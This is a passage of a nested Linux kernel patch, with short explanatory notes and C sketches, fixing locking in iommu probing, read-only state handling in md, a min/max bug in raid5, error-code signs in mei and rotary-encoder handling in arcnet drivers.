+ 	wait_for_completion(&srv_path->complete_done);
+ 
++	rtrs_srv_destroy_path_files(srv_path);
++
+ 	/* Notify upper layer if we are the last path */
+ 	rtrs_srv_path_down(srv_path);
+ 
+diff --git a/drivers/iommu/iommu.c b/drivers/iommu/iommu.c
+index 2bcd1f23d07d2..8b38972394776 100644
+--- a/drivers/iommu/iommu.c
++++ b/drivers/iommu/iommu.c
+@@ -278,12 +278,13 @@ static void dev_iommu_free(struct device *dev)
+ 	kfree(param);
+ }
+ 
++DEFINE_MUTEX(iommu_probe_device_lock);
++
+ static int __iommu_probe_device(struct device *dev, struct list_head *group_list)
+ {
+ 	const struct iommu_ops *ops = dev->bus->iommu_ops;
+ 	struct iommu_device *iommu_dev;
+ 	struct iommu_group *group;
+-	static DEFINE_MUTEX(iommu_probe_device_lock);
+ 	int ret;
+ 
+ 	if (!ops)
+@@ -295,11 +296,9 @@ static int __iommu_probe_device(struct device *dev, struct list_head *group_list
+ 	 * probably be able to use device_lock() here to minimise the scope,
+ 	 * but for now enforcing a simple global ordering is fine.
+ 	 */
+-	mutex_lock(&iommu_probe_device_lock);
+-	if (!dev_iommu_get(dev)) {
+-		ret = -ENOMEM;
+-		goto err_unlock;
+-	}
++	lockdep_assert_held(&iommu_probe_device_lock);
++	if (!dev_iommu_get(dev))
++		return -ENOMEM;
+ 
+ 	if (!try_module_get(ops->owner)) {
+ 		ret = -EINVAL;
+@@ -326,7 +325,6 @@ static int __iommu_probe_device(struct device *dev, struct list_head *group_list
+ 	mutex_unlock(&group->mutex);
+ 	iommu_group_put(group);
+ 
+-	mutex_unlock(&iommu_probe_device_lock);
+ 	iommu_device_link(iommu_dev, dev);
+ 
+ 	return 0;
+@@ -341,9 +339,6 @@ out_module_put:
+ err_free:
+ 	dev_iommu_free(dev);
+ 
+-err_unlock:
+-	mutex_unlock(&iommu_probe_device_lock);
+-
+ 	return ret;
+ }
+ 
+@@ -353,7 +348,9 @@ int iommu_probe_device(struct device *dev)
+ 	struct iommu_group *group;
+ 	int ret;
+ 
++	mutex_lock(&iommu_probe_device_lock);
+ 	ret = __iommu_probe_device(dev, NULL);
++	mutex_unlock(&iommu_probe_device_lock);
+ 	if (ret)
+ 		goto err_out;
+ 
+@@ -1684,7 +1681,9 @@ static int probe_iommu_group(struct device *dev, void *data)
+ 		return 0;
+ 	}
+ 
++	mutex_lock(&iommu_probe_device_lock);
+ 	ret = __iommu_probe_device(dev, group_list);
++	mutex_unlock(&iommu_probe_device_lock);
+ 	if (ret == -ENODEV)
+ 		ret = 0;
+ 
+diff --git a/drivers/iommu/of_iommu.c b/drivers/iommu/of_iommu.c
+index 5696314ae69e7..1fa1db3be8529 100644
+--- a/drivers/iommu/of_iommu.c
++++ b/drivers/iommu/of_iommu.c
+@@ -112,16 +112,20 @@ const struct iommu_ops *of_iommu_configure(struct device *dev,
+ 					   const u32 *id)
+ {
+ 	const struct iommu_ops *ops = NULL;
+-	struct iommu_fwspec *fwspec = dev_iommu_fwspec_get(dev);
++	struct iommu_fwspec *fwspec;
+ 	int err = NO_IOMMU;
+ 
+ 	if (!master_np)
+ 		return NULL;
+ 
++	/* Serialise to make dev->iommu stable under our potential fwspec */
++	mutex_lock(&iommu_probe_device_lock);
++	fwspec = dev_iommu_fwspec_get(dev);
+ 	if (fwspec) {
+-		if (fwspec->ops)
++		if (fwspec->ops) {
++			mutex_unlock(&iommu_probe_device_lock);
+ 			return fwspec->ops;
+-
++		}
+ 		/* In the deferred case, start again from scratch */
+ 		iommu_fwspec_free(dev);
+ 	}
+@@ -155,6 +159,8 @@ const struct iommu_ops *of_iommu_configure(struct device *dev,
+ 		fwspec = dev_iommu_fwspec_get(dev);
+ 		ops    = fwspec->ops;
+ 	}
++	mutex_unlock(&iommu_probe_device_lock);
++
+ 	/*
+ 	 * If we have reason to believe the IOMMU driver missed the initial
+ 	 * probe for dev, replay it to get things in order.
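
Both iommu hunks move the same lock outward: __iommu_probe_device() no longer
takes iommu_probe_device_lock itself and merely asserts it is held, while each
caller (including of_iommu_configure(), which now also needs it to keep
dev->iommu stable while building the fwspec) takes the mutex around the call.
A pthread sketch of the caller-locks/callee-asserts split, where the
probe_lock_held flag is a crude stand-in for lockdep:

#include <assert.h>
#include <pthread.h>
#include <stdio.h>

static pthread_mutex_t probe_lock = PTHREAD_MUTEX_INITIALIZER;
static int probe_lock_held;	/* poor man's lockdep_assert_held() */

static int __probe_device(int dev)
{
	assert(probe_lock_held);	/* caller must hold probe_lock */
	printf("probing %d\n", dev);
	return 0;
}

static int probe_device(int dev)
{
	int ret;

	pthread_mutex_lock(&probe_lock);
	probe_lock_held = 1;
	ret = __probe_device(dev);
	probe_lock_held = 0;
	pthread_mutex_unlock(&probe_lock);
	return ret;
}

int main(void) { return probe_device(7); }
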
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 20f67edae95d0..0c2801d770901 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -93,6 +93,18 @@ static int remove_and_add_spares(struct mddev *mddev,
+ 				 struct md_rdev *this);
+ static void mddev_detach(struct mddev *mddev);
+ 
++enum md_ro_state {
++	MD_RDWR,
++	MD_RDONLY,
++	MD_AUTO_READ,
++	MD_MAX_STATE
++};
++
++static bool md_is_rdwr(struct mddev *mddev)
++{
++	return (mddev->ro == MD_RDWR);
++}
++
+ /*
+  * Default number of read corrections we'll attempt on an rdev
+  * before ejecting it from the array. We divide the read error
+@@ -444,7 +456,7 @@ static void md_submit_bio(struct bio *bio)
+ 	if (!bio)
+ 		return;
+ 
+-	if (mddev->ro == 1 && unlikely(rw == WRITE)) {
++	if (mddev->ro == MD_RDONLY && unlikely(rw == WRITE)) {
+ 		if (bio_sectors(bio) != 0)
+ 			bio->bi_status = BLK_STS_IOERR;
+ 		bio_endio(bio);
+@@ -2643,7 +2655,7 @@ void md_update_sb(struct mddev *mddev, int force_change)
+ 	int any_badblocks_changed = 0;
+ 	int ret = -1;
+ 
+-	if (mddev->ro) {
++	if (!md_is_rdwr(mddev)) {
+ 		if (force_change)
+ 			set_bit(MD_SB_CHANGE_DEVS, &mddev->sb_flags);
+ 		return;
+@@ -3909,7 +3921,7 @@ level_store(struct mddev *mddev, const char *buf, size_t len)
+ 		goto out_unlock;
+ 	}
+ 	rv = -EROFS;
+-	if (mddev->ro)
++	if (!md_is_rdwr(mddev))
+ 		goto out_unlock;
+ 
+ 	/* request to change the personality.  Need to ensure:
+@@ -4115,7 +4127,7 @@ layout_store(struct mddev *mddev, const char *buf, size_t len)
+ 	if (mddev->pers) {
+ 		if (mddev->pers->check_reshape == NULL)
+ 			err = -EBUSY;
+-		else if (mddev->ro)
++		else if (!md_is_rdwr(mddev))
+ 			err = -EROFS;
+ 		else {
+ 			mddev->new_layout = n;
+@@ -4224,7 +4236,7 @@ chunk_size_store(struct mddev *mddev, const char *buf, size_t len)
+ 	if (mddev->pers) {
+ 		if (mddev->pers->check_reshape == NULL)
+ 			err = -EBUSY;
+-		else if (mddev->ro)
++		else if (!md_is_rdwr(mddev))
+ 			err = -EROFS;
+ 		else {
+ 			mddev->new_chunk_sectors = n >> 9;
+@@ -4347,13 +4359,13 @@ array_state_show(struct mddev *mddev, char *page)
+ 
+ 	if (mddev->pers && !test_bit(MD_NOT_READY, &mddev->flags)) {
+ 		switch(mddev->ro) {
+-		case 1:
++		case MD_RDONLY:
+ 			st = readonly;
+ 			break;
+-		case 2:
++		case MD_AUTO_READ:
+ 			st = read_auto;
+ 			break;
+-		case 0:
++		case MD_RDWR:
+ 			spin_lock(&mddev->lock);
+ 			if (test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags))
+ 				st = write_pending;
+@@ -4389,7 +4401,8 @@ array_state_store(struct mddev *mddev, const char *buf, size_t len)
+ 	int err = 0;
+ 	enum array_state st = match_word(buf, array_states);
+ 
+-	if (mddev->pers && (st == active || st == clean) && mddev->ro != 1) {
++	if (mddev->pers && (st == active || st == clean) &&
++	    mddev->ro != MD_RDONLY) {
+ 		/* don't take reconfig_mutex when toggling between
+ 		 * clean and active
+ 		 */
+@@ -4433,23 +4446,23 @@ array_state_store(struct mddev *mddev, const char *buf, size_t len)
+ 		if (mddev->pers)
+ 			err = md_set_readonly(mddev, NULL);
+ 		else {
+-			mddev->ro = 1;
++			mddev->ro = MD_RDONLY;
+ 			set_disk_ro(mddev->gendisk, 1);
+ 			err = do_md_run(mddev);
+ 		}
+ 		break;
+ 	case read_auto:
+ 		if (mddev->pers) {
+-			if (mddev->ro == 0)
++			if (md_is_rdwr(mddev))
+ 				err = md_set_readonly(mddev, NULL);
+-			else if (mddev->ro == 1)
++			else if (mddev->ro == MD_RDONLY)
+ 				err = restart_array(mddev);
+ 			if (err == 0) {
+-				mddev->ro = 2;
++				mddev->ro = MD_AUTO_READ;
+ 				set_disk_ro(mddev->gendisk, 0);
+ 			}
+ 		} else {
+-			mddev->ro = 2;
++			mddev->ro = MD_AUTO_READ;
+ 			err = do_md_run(mddev);
+ 		}
+ 		break;
+@@ -4474,7 +4487,7 @@ array_state_store(struct mddev *mddev, const char *buf, size_t len)
+ 			wake_up(&mddev->sb_wait);
+ 			err = 0;
+ 		} else {
+-			mddev->ro = 0;
++			mddev->ro = MD_RDWR;
+ 			set_disk_ro(mddev->gendisk, 0);
+ 			err = do_md_run(mddev);
+ 		}
+@@ -4775,7 +4788,7 @@ action_show(struct mddev *mddev, char *page)
+ 	if (test_bit(MD_RECOVERY_FROZEN, &recovery))
+ 		type = "frozen";
+ 	else if (test_bit(MD_RECOVERY_RUNNING, &recovery) ||
+-	    (!mddev->ro && test_bit(MD_RECOVERY_NEEDED, &recovery))) {
++	    (md_is_rdwr(mddev) && test_bit(MD_RECOVERY_NEEDED, &recovery))) {
+ 		if (test_bit(MD_RECOVERY_RESHAPE, &recovery))
+ 			type = "reshape";
+ 		else if (test_bit(MD_RECOVERY_SYNC, &recovery)) {
+@@ -4861,11 +4874,11 @@ action_store(struct mddev *mddev, const char *page, size_t len)
+ 		set_bit(MD_RECOVERY_REQUESTED, &mddev->recovery);
+ 		set_bit(MD_RECOVERY_SYNC, &mddev->recovery);
+ 	}
+-	if (mddev->ro == 2) {
++	if (mddev->ro == MD_AUTO_READ) {
+ 		/* A write to sync_action is enough to justify
+ 		 * canceling read-auto mode
+ 		 */
+-		mddev->ro = 0;
++		mddev->ro = MD_RDWR;
+ 		md_wakeup_thread(mddev->sync_thread);
+ 	}
+ 	set_bit(MD_RECOVERY_NEEDED, &mddev->recovery);
+@@ -5093,8 +5106,7 @@ max_sync_store(struct mddev *mddev, const char *buf, size_t len)
+ 			goto out_unlock;
+ 
+ 		err = -EBUSY;
+-		if (max < mddev->resync_max &&
+-		    mddev->ro == 0 &&
++		if (max < mddev->resync_max && md_is_rdwr(mddev) &&
+ 		    test_bit(MD_RECOVERY_RUNNING, &mddev->recovery))
+ 			goto out_unlock;
+ 
+@@ -5829,8 +5841,8 @@ int md_run(struct mddev *mddev)
+ 			continue;
+ 		sync_blockdev(rdev->bdev);
+ 		invalidate_bdev(rdev->bdev);
+-		if (mddev->ro != 1 && rdev_read_only(rdev)) {
+-			mddev->ro = 1;
++		if (mddev->ro != MD_RDONLY && rdev_read_only(rdev)) {
++			mddev->ro = MD_RDONLY;
+ 			if (mddev->gendisk)
+ 				set_disk_ro(mddev->gendisk, 1);
+ 		}
+@@ -5938,8 +5950,8 @@ int md_run(struct mddev *mddev)
+ 
+ 	mddev->ok_start_degraded = start_dirty_degraded;
+ 
+-	if (start_readonly && mddev->ro == 0)
+-		mddev->ro = 2; /* read-only, but switch on first write */
++	if (start_readonly && md_is_rdwr(mddev))
++		mddev->ro = MD_AUTO_READ; /* read-only, but switch on first write */
+ 
+ 	err = pers->run(mddev);
+ 	if (err)
+@@ -6017,8 +6029,8 @@ int md_run(struct mddev *mddev)
+ 		mddev->sysfs_action = sysfs_get_dirent_safe(mddev->kobj.sd, "sync_action");
+ 		mddev->sysfs_completed = sysfs_get_dirent_safe(mddev->kobj.sd, "sync_completed");
+ 		mddev->sysfs_degraded = sysfs_get_dirent_safe(mddev->kobj.sd, "degraded");
+-	} else if (mddev->ro == 2) /* auto-readonly not meaningful */
+-		mddev->ro = 0;
++	} else if (mddev->ro == MD_AUTO_READ)
++		mddev->ro = MD_RDWR;
+ 
+ 	atomic_set(&mddev->max_corr_read_errors,
+ 		   MD_DEFAULT_MAX_CORRECTED_READ_ERRORS);
+@@ -6036,7 +6048,7 @@ int md_run(struct mddev *mddev)
+ 		if (rdev->raid_disk >= 0)
+ 			sysfs_link_rdev(mddev, rdev); /* failure here is OK */
+ 
+-	if (mddev->degraded && !mddev->ro)
++	if (mddev->degraded && md_is_rdwr(mddev))
+ 		/* This ensures that recovering status is reported immediately
+ 		 * via sysfs - until a lack of spares is confirmed.
+ 		 */
+@@ -6128,7 +6140,7 @@ static int restart_array(struct mddev *mddev)
+ 		return -ENXIO;
+ 	if (!mddev->pers)
+ 		return -EINVAL;
+-	if (!mddev->ro)
++	if (md_is_rdwr(mddev))
+ 		return -EBUSY;
+ 
+ 	rcu_read_lock();
+@@ -6147,7 +6159,7 @@ static int restart_array(struct mddev *mddev)
+ 		return -EROFS;
+ 
+ 	mddev->safemode = 0;
+-	mddev->ro = 0;
++	mddev->ro = MD_RDWR;
+ 	set_disk_ro(disk, 0);
+ 	pr_debug("md: %s switched to read-write mode.\n", mdname(mddev));
+ 	/* Kick recovery or resync if necessary */
+@@ -6174,7 +6186,7 @@ static void md_clean(struct mddev *mddev)
+ 	mddev->clevel[0] = 0;
+ 	mddev->flags = 0;
+ 	mddev->sb_flags = 0;
+-	mddev->ro = 0;
++	mddev->ro = MD_RDWR;
+ 	mddev->metadata_type[0] = 0;
+ 	mddev->chunk_sectors = 0;
+ 	mddev->ctime = mddev->utime = 0;
+@@ -6226,7 +6238,7 @@ static void __md_stop_writes(struct mddev *mddev)
+ 	}
+ 	md_bitmap_flush(mddev);
+ 
+-	if (mddev->ro == 0 &&
++	if (md_is_rdwr(mddev) &&
+ 	    ((!mddev->in_sync && !mddev_is_clustered(mddev)) ||
+ 	     mddev->sb_flags)) {
+ 		/* mark array as shutdown cleanly */
+@@ -6302,6 +6314,9 @@ static int md_set_readonly(struct mddev *mddev, struct block_device *bdev)
+ 	int err = 0;
+ 	int did_freeze = 0;
+ 
++	if (mddev->external && test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags))
++		return -EBUSY;
++
+ 	if (!test_bit(MD_RECOVERY_FROZEN, &mddev->recovery)) {
+ 		did_freeze = 1;
+ 		set_bit(MD_RECOVERY_FROZEN, &mddev->recovery);
+@@ -6314,8 +6329,6 @@ static int md_set_readonly(struct mddev *mddev, struct block_device *bdev)
+ 		 * which will now never happen */
+ 		wake_up_process(mddev->sync_thread->tsk);
+ 
+-	if (mddev->external && test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags))
+-		return -EBUSY;
+ 	mddev_unlock(mddev);
+ 	wait_event(resync_wait, !test_bit(MD_RECOVERY_RUNNING,
+ 					  &mddev->recovery));
+@@ -6328,29 +6341,30 @@ static int md_set_readonly(struct mddev *mddev, struct block_device *bdev)
+ 	    mddev->sync_thread ||
+ 	    test_bit(MD_RECOVERY_RUNNING, &mddev->recovery)) {
+ 		pr_warn("md: %s still in use.\n",mdname(mddev));
+-		if (did_freeze) {
+-			clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery);
+-			set_bit(MD_RECOVERY_NEEDED, &mddev->recovery);
+-			md_wakeup_thread(mddev->thread);
+-		}
+ 		err = -EBUSY;
+ 		goto out;
+ 	}
++
+ 	if (mddev->pers) {
+ 		__md_stop_writes(mddev);
+ 
+-		err  = -ENXIO;
+-		if (mddev->ro==1)
++		if (mddev->ro == MD_RDONLY) {
++			err  = -ENXIO;
+ 			goto out;
+-		mddev->ro = 1;
++		}
++
++		mddev->ro = MD_RDONLY;
+ 		set_disk_ro(mddev->gendisk, 1);
++	}
++
++out:
++	if ((mddev->pers && !err) || did_freeze) {
+ 		clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery);
+ 		set_bit(MD_RECOVERY_NEEDED, &mddev->recovery);
+ 		md_wakeup_thread(mddev->thread);
+ 		sysfs_notify_dirent_safe(mddev->sysfs_state);
+-		err = 0;
+ 	}
+-out:
++
+ 	mutex_unlock(&mddev->open_mutex);
+ 	return err;
+ }
+@@ -6399,7 +6413,7 @@ static int do_md_stop(struct mddev *mddev, int mode,
+ 		return -EBUSY;
+ 	}
+ 	if (mddev->pers) {
+-		if (mddev->ro)
++		if (!md_is_rdwr(mddev))
+ 			set_disk_ro(disk, 0);
+ 
+ 		__md_stop_writes(mddev);
+@@ -6416,8 +6430,8 @@ static int do_md_stop(struct mddev *mddev, int mode,
+ 		mutex_unlock(&mddev->open_mutex);
+ 		mddev->changed = 1;
+ 
+-		if (mddev->ro)
+-			mddev->ro = 0;
++		if (!md_is_rdwr(mddev))
++			mddev->ro = MD_RDWR;
+ 	} else
+ 		mutex_unlock(&mddev->open_mutex);
+ 	/*
+@@ -7232,7 +7246,7 @@ static int update_size(struct mddev *mddev, sector_t num_sectors)
+ 	if (test_bit(MD_RECOVERY_RUNNING, &mddev->recovery) ||
+ 	    mddev->sync_thread)
+ 		return -EBUSY;
+-	if (mddev->ro)
++	if (!md_is_rdwr(mddev))
+ 		return -EROFS;
+ 
+ 	rdev_for_each(rdev, mddev) {
+@@ -7262,7 +7276,7 @@ static int update_raid_disks(struct mddev *mddev, int raid_disks)
+ 	/* change the number of raid disks */
+ 	if (mddev->pers->check_reshape == NULL)
+ 		return -EINVAL;
+-	if (mddev->ro)
++	if (!md_is_rdwr(mddev))
+ 		return -EROFS;
+ 	if (raid_disks <= 0 ||
+ 	    (mddev->max_disks && raid_disks >= mddev->max_disks))
+@@ -7686,26 +7700,25 @@ static int md_ioctl(struct block_device *bdev, fmode_t mode,
+ 	 * The remaining ioctls are changing the state of the
+ 	 * superblock, so we do not allow them on read-only arrays.
+ 	 */
+-	if (mddev->ro && mddev->pers) {
+-		if (mddev->ro == 2) {
+-			mddev->ro = 0;
+-			sysfs_notify_dirent_safe(mddev->sysfs_state);
+-			set_bit(MD_RECOVERY_NEEDED, &mddev->recovery);
+-			/* mddev_unlock will wake thread */
+-			/* If a device failed while we were read-only, we
+-			 * need to make sure the metadata is updated now.
+-			 */
+-			if (test_bit(MD_SB_CHANGE_DEVS, &mddev->sb_flags)) {
+-				mddev_unlock(mddev);
+-				wait_event(mddev->sb_wait,
+-					   !test_bit(MD_SB_CHANGE_DEVS, &mddev->sb_flags) &&
+-					   !test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags));
+-				mddev_lock_nointr(mddev);
+-			}
+-		} else {
++	if (!md_is_rdwr(mddev) && mddev->pers) {
++		if (mddev->ro != MD_AUTO_READ) {
+ 			err = -EROFS;
+ 			goto unlock;
+ 		}
++		mddev->ro = MD_RDWR;
++		sysfs_notify_dirent_safe(mddev->sysfs_state);
++		set_bit(MD_RECOVERY_NEEDED, &mddev->recovery);
++		/* mddev_unlock will wake thread */
++		/* If a device failed while we were read-only, we
++		 * need to make sure the metadata is updated now.
++		 */
++		if (test_bit(MD_SB_CHANGE_DEVS, &mddev->sb_flags)) {
++			mddev_unlock(mddev);
++			wait_event(mddev->sb_wait,
++				   !test_bit(MD_SB_CHANGE_DEVS, &mddev->sb_flags) &&
++				   !test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags));
++			mddev_lock_nointr(mddev);
++		}
+ 	}
+ 
+ 	switch (cmd) {
+@@ -7791,11 +7804,11 @@ static int md_set_read_only(struct block_device *bdev, bool ro)
+ 	 * Transitioning to read-auto need only happen for arrays that call
+ 	 * md_write_start and which are not ready for writes yet.
+ 	 */
+-	if (!ro && mddev->ro == 1 && mddev->pers) {
++	if (!ro && mddev->ro == MD_RDONLY && mddev->pers) {
+ 		err = restart_array(mddev);
+ 		if (err)
+ 			goto out_unlock;
+-		mddev->ro = 2;
++		mddev->ro = MD_AUTO_READ;
+ 	}
+ 
+ out_unlock:
+@@ -8269,9 +8282,9 @@ static int md_seq_show(struct seq_file *seq, void *v)
+ 		seq_printf(seq, "%s : %sactive", mdname(mddev),
+ 						mddev->pers ? "" : "in");
+ 		if (mddev->pers) {
+-			if (mddev->ro==1)
++			if (mddev->ro == MD_RDONLY)
+ 				seq_printf(seq, " (read-only)");
+-			if (mddev->ro==2)
++			if (mddev->ro == MD_AUTO_READ)
+ 				seq_printf(seq, " (auto-read-only)");
+ 			seq_printf(seq, " %s", mddev->pers->name);
+ 		}
+@@ -8530,10 +8543,10 @@ bool md_write_start(struct mddev *mddev, struct bio *bi)
+ 	if (bio_data_dir(bi) != WRITE)
+ 		return true;
+ 
+-	BUG_ON(mddev->ro == 1);
+-	if (mddev->ro == 2) {
++	BUG_ON(mddev->ro == MD_RDONLY);
++	if (mddev->ro == MD_AUTO_READ) {
+ 		/* need to switch to read/write */
+-		mddev->ro = 0;
++		mddev->ro = MD_RDWR;
+ 		set_bit(MD_RECOVERY_NEEDED, &mddev->recovery);
+ 		md_wakeup_thread(mddev->thread);
+ 		md_wakeup_thread(mddev->sync_thread);
+@@ -8584,7 +8597,7 @@ void md_write_inc(struct mddev *mddev, struct bio *bi)
+ {
+ 	if (bio_data_dir(bi) != WRITE)
+ 		return;
+-	WARN_ON_ONCE(mddev->in_sync || mddev->ro);
++	WARN_ON_ONCE(mddev->in_sync || !md_is_rdwr(mddev));
+ 	percpu_ref_get(&mddev->writes_pending);
+ }
+ EXPORT_SYMBOL(md_write_inc);
+@@ -8690,7 +8703,7 @@ void md_allow_write(struct mddev *mddev)
+ {
+ 	if (!mddev->pers)
+ 		return;
+-	if (mddev->ro)
++	if (!md_is_rdwr(mddev))
+ 		return;
+ 	if (!mddev->pers->sync_request)
+ 		return;
+@@ -8738,7 +8751,7 @@ void md_do_sync(struct md_thread *thread)
+ 	if (test_bit(MD_RECOVERY_DONE, &mddev->recovery) ||
+ 	    test_bit(MD_RECOVERY_WAIT, &mddev->recovery))
+ 		return;
+-	if (mddev->ro) {/* never try to sync a read-only array */
++	if (!md_is_rdwr(mddev)) {/* never try to sync a read-only array */
+ 		set_bit(MD_RECOVERY_INTR, &mddev->recovery);
+ 		return;
+ 	}
+@@ -9207,9 +9220,9 @@ static int remove_and_add_spares(struct mddev *mddev,
+ 		if (test_bit(Faulty, &rdev->flags))
+ 			continue;
+ 		if (!test_bit(Journal, &rdev->flags)) {
+-			if (mddev->ro &&
+-			    ! (rdev->saved_raid_disk >= 0 &&
+-			       !test_bit(Bitmap_sync, &rdev->flags)))
++			if (!md_is_rdwr(mddev) &&
++			    !(rdev->saved_raid_disk >= 0 &&
++			      !test_bit(Bitmap_sync, &rdev->flags)))
+ 				continue;
+ 
+ 			rdev->recovery_offset = 0;
+@@ -9307,7 +9320,8 @@ void md_check_recovery(struct mddev *mddev)
+ 		flush_signals(current);
+ 	}
+ 
+-	if (mddev->ro && !test_bit(MD_RECOVERY_NEEDED, &mddev->recovery))
++	if (!md_is_rdwr(mddev) &&
++	    !test_bit(MD_RECOVERY_NEEDED, &mddev->recovery))
+ 		return;
+ 	if ( ! (
+ 		(mddev->sb_flags & ~ (1<<MD_SB_CHANGE_PENDING)) ||
+@@ -9326,7 +9340,7 @@ void md_check_recovery(struct mddev *mddev)
+ 		if (!mddev->external && mddev->safemode == 1)
+ 			mddev->safemode = 0;
+ 
+-		if (mddev->ro) {
++		if (!md_is_rdwr(mddev)) {
+ 			struct md_rdev *rdev;
+ 			if (!mddev->external && mddev->in_sync)
+ 				/* 'Blocked' flag not needed as failed devices
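
Most of the md.c hunk is mechanical: the magic mddev->ro values 0/1/2 become
the named enum md_ro_state (MD_RDWR/MD_RDONLY/MD_AUTO_READ) plus the
md_is_rdwr() helper, so call sites read as intent instead of numerology. A
compilable distillation using the names the hunk introduces:

#include <stdbool.h>
#include <stdio.h>

enum md_ro_state { MD_RDWR, MD_RDONLY, MD_AUTO_READ };

struct mddev { enum md_ro_state ro; };

static bool md_is_rdwr(const struct mddev *m)
{
	return m->ro == MD_RDWR;
}

int main(void)
{
	struct mddev m = { .ro = MD_AUTO_READ };

	/* was: if (mddev->ro == 2) ... */
	if (!md_is_rdwr(&m) && m.ro == MD_AUTO_READ)
		puts("auto-read-only: first write flips the array to MD_RDWR");
	return 0;
}
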
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index 98d4e93efa31c..e4564ca1f2434 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -5905,11 +5905,11 @@ static bool stripe_ahead_of_reshape(struct mddev *mddev, struct r5conf *conf,
+ 	int dd_idx;
+ 
+ 	for (dd_idx = 0; dd_idx < sh->disks; dd_idx++) {
+-		if (dd_idx == sh->pd_idx)
++		if (dd_idx == sh->pd_idx || dd_idx == sh->qd_idx)
+ 			continue;
+ 
+ 		min_sector = min(min_sector, sh->dev[dd_idx].sector);
+-		max_sector = min(max_sector, sh->dev[dd_idx].sector);
++		max_sector = max(max_sector, sh->dev[dd_idx].sector);
+ 	}
+ 
+ 	spin_lock_irq(&conf->device_lock);
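
The raid5 hunk fixes stripe_ahead_of_reshape() on two counts: the running
maximum was accumulated with min(), so it could never rise above the first
device sector examined, and the parity (pd_idx) and Q (qd_idx) disks are now
skipped. A few lines of C make the first bug concrete:

#include <stdio.h>

#define min(a, b) ((a) < (b) ? (a) : (b))
#define max(a, b) ((a) > (b) ? (a) : (b))

int main(void)
{
	long sectors[] = { 100, 300, 200 };
	long max_buggy = sectors[0], max_fixed = sectors[0];

	for (int i = 1; i < 3; i++) {
		max_buggy = min(max_buggy, sectors[i]);	/* never grows */
		max_fixed = max(max_fixed, sectors[i]);
	}
	printf("buggy=%ld fixed=%ld\n", max_buggy, max_fixed); /* 100 vs 300 */
	return 0;
}
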
+diff --git a/drivers/misc/mei/client.c b/drivers/misc/mei/client.c
+index 0b2fbe1335a77..c70c89209fe55 100644
+--- a/drivers/misc/mei/client.c
++++ b/drivers/misc/mei/client.c
+@@ -1978,7 +1978,7 @@ ssize_t mei_cl_write(struct mei_cl *cl, struct mei_cl_cb *cb)
+ 
+ 	mei_hdr = mei_msg_hdr_init(cb);
+ 	if (IS_ERR(mei_hdr)) {
+-		rets = -PTR_ERR(mei_hdr);
++		rets = PTR_ERR(mei_hdr);
+ 		mei_hdr = NULL;
+ 		goto err;
+ 	}
+@@ -2002,7 +2002,7 @@ ssize_t mei_cl_write(struct mei_cl *cl, struct mei_cl_cb *cb)
+ 
+ 	hbuf_slots = mei_hbuf_empty_slots(dev);
+ 	if (hbuf_slots < 0) {
+-		rets = -EOVERFLOW;
++		buf_len = -EOVERFLOW;
+ 		goto out;
+ 	}
+ 
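
The first mei hunk fixes a double negation: PTR_ERR() on an ERR_PTR-encoded
pointer already yields a negative errno, so -PTR_ERR() handed callers a
positive "error". A userspace sketch of the encoding (simplified from the
kernel's linux/err.h):

#include <errno.h>
#include <stdio.h>

#define MAX_ERRNO 4095

static void *ERR_PTR(long error) { return (void *)error; }
static long PTR_ERR(const void *ptr) { return (long)ptr; }
static int IS_ERR(const void *ptr)
{
	/* errors live in the top MAX_ERRNO values of the address space */
	return (unsigned long)ptr >= (unsigned long)-MAX_ERRNO;
}

int main(void)
{
	void *hdr = ERR_PTR(-ENOMEM);

	if (IS_ERR(hdr)) {
		printf("PTR_ERR  = %ld (correct)\n", PTR_ERR(hdr));
		printf("-PTR_ERR = %ld (the old bug)\n", -PTR_ERR(hdr));
	}
	return 0;
}

The second hunk similarly reroutes a host-buffer overflow through buf_len at
the out label instead of overwriting rets directly.
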
+diff --git a/drivers/net/arcnet/arcdevice.h b/drivers/net/arcnet/arcdevice.h
+index 19e996a829c9d..b54275389f8ac 100644
+--- a/drivers/net/arcnet/arcdevice.h
++++ b/drivers/net/arcnet/arcdevice.h
+@@ -186,6 +186,8 @@ do {									\
+ #define ARC_IS_5MBIT    1   /* card default speed is 5MBit */
+ #define ARC_CAN_10MBIT  2   /* card uses COM20022, supporting 10MBit,
+ 				 but default is 2.5MBit. */
++#define ARC_HAS_LED     4   /* card has software controlled LEDs */
++#define ARC_HAS_ROTARY  8   /* card has rotary encoder */
+ 
+ /* information needed to define an encapsulation driver */
+ struct ArcProto {
+diff --git a/drivers/net/arcnet/com20020-pci.c b/drivers/net/arcnet/com20020-pci.c
+index c580acb8b1d34..7b5c8bb02f119 100644
+--- a/drivers/net/arcnet/com20020-pci.c
++++ b/drivers/net/arcnet/com20020-pci.c
+@@ -213,12 +213,13 @@ static int com20020pci_probe(struct pci_dev *pdev,
+ 		if (!strncmp(ci->name, "EAE PLX-PCI FB2", 15))
+ 			lp->backplane = 1;
+ 
+-		/* Get the dev_id from the PLX rotary coder */
+-		if (!strncmp(ci->name, "EAE PLX-PCI MA1", 15))
+-			dev_id_mask = 0x3;
+-		dev->dev_id = (inb(priv->misc + ci->rotary) >> 4) & dev_id_mask;
+-
+-		snprintf(dev->name, sizeof(dev->name), "arc%d-%d", dev->dev_id, i);
++		if (ci->flags & ARC_HAS_ROTARY) {
++			/* Get the dev_id from the PLX rotary coder */
++			if (!strncmp(ci->name, "EAE PLX-PCI MA1", 15))
++				dev_id_mask = 0x3;
++			dev->dev_id = (inb(priv->misc + ci->rotary) >> 4) & dev_id_mask;
++			snprintf(dev->name, sizeof(dev->name), "arc%d-%d", dev->dev_id, i);
++		}
+ 
+ 		if (arcnet_inb(ioaddr, COM20020_REG_R_STATUS) == 0xFF) {
+ 			pr_err("IO address %Xh is empty!\n", ioaddr);
+@@ -230,6 +231,10 @@ static int com20020pci_probe(struct pci_dev *pdev,
+ 			goto err_free_arcdev;
+ 		}
+ 
